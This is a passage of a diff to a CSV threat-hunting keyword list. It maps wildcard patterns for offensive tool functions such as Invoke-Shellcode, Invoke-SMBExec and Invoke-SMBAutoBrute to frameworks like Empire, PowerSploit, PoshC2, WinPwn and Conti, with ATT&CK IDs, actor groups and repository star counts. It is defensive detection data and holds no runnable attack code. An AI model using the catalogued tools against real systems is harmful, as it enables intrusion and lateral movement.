Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Shellcode.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-ShellcodeMSIL*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ShellCommand*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ShellcodeMSIL*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ShellCommand*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Invoke-SMBAutoBrute*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - 
APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-smbclient *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral 
movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-SMBClient*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SMBEnum*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-smbexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smbclient *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBClient*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBEnum*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-smbexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-SMBExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SMBExec*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBExec*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SMBExec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SMBExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-smblogin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-SMBNegotiate 
-ComputerName localhost*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SMBNegotiate*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smblogin *","offensive_tool_keyword","poshc2","keywords from 